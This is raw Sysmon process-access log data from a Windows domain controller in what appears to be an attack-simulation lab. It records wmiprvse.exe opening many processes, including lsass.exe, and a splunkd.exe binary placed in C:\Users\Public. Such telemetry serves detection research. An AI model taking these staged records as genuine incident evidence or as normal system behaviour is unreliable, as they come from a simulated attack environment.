16:00:03.084{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:03.068{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000028543Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.927{7901BC46-5388-6008-8706-00000000A301}40847444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028542Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.771{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-5388-6008-8706-00000000A301}4084C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028541Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:00:08.771{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000028540Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 